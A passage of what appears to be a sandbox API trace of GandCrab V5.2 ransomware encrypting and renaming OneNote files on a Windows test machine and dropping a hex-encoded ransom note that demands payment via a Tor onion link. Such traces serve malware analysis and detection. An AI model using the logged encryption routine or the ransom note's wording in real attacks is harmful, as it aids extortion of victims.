(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0072.842] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.842] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0072.843] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.844] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0072.844] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.844] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.844] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.844] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0072.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.845] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.845] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.845] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0072.845] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.845] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.846] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.846] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0072.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.846] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.846] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.846] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0072.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.847] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0072.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.847] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0072.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.847] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0072.848] GetLastError () returned 0x0 [0072.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.848] CryptDestroyKey (hKey=0x5037f8) returned 1 [0072.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.848] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.848] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0072.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.849] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033b8) returned 1 [0072.849] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.849] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0072.849] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.849] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0072.849] GetLastError () returned 0x0 [0072.849] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.849] CryptDestroyKey (hKey=0x5033b8) returned 1 [0072.849] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.850] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.850] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.850] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.850] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1440, lpOverlapped=0x0) returned 1 [0072.856] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffebc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.856] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1440, lpOverlapped=0x0) returned 1 [0072.857] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.857] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0072.858] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.862] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.862] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.863] CloseHandle (hObject=0x2cc) returned 1 [0072.864] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat.titwmvjl"), dwFlags=0x1) returned 1 [0072.865] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.865] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.865] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.865] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt" [0072.865] lstrlenW (lpString=".titwmvjl") returned 9 [0072.865] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt") returned 81 [0072.866] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.866] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0072.866] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt") returned 81 [0072.866] lstrlenW (lpString=".txt") returned 4 [0072.866] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.866] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.866] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.866] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.866] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt") returned 81 [0072.866] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\TITWMVJL-DECRYPT.txt") returned 81 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.866] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.866] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.867] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.867] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0072.867] CloseHandle (hObject=0x2c4) returned 1 [0072.867] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.868] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.868] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.868] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock" [0072.868] lstrlenW (lpString=".titwmvjl") returned 9 [0072.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.868] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.868] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0072.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.868] lstrlenW (lpString=".lock") returned 5 [0072.868] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.868] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.868] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.868] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.869] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.869] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.869] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.869] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt" [0072.869] lstrlenW (lpString=".titwmvjl") returned 9 [0072.869] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt") returned 76 [0072.869] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.869] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0072.869] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt") returned 76 [0072.869] lstrlenW (lpString=".txt") returned 4 [0072.869] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.869] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.869] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.869] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt") returned 76 [0072.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\TITWMVJL-DECRYPT.txt") returned 76 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.870] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.870] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.870] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0072.871] CloseHandle (hObject=0x2bc) returned 1 [0072.871] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.871] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0072.871] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0072.871] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Outlook" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook" [0072.871] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\" [0072.871] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.871] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.872] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.872] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.872] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.872] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.872] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.872] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.872] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.872] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.873] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.873] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\\\TITWMVJL-DECRYPT.txt") returned 77 [0072.873] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.874] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x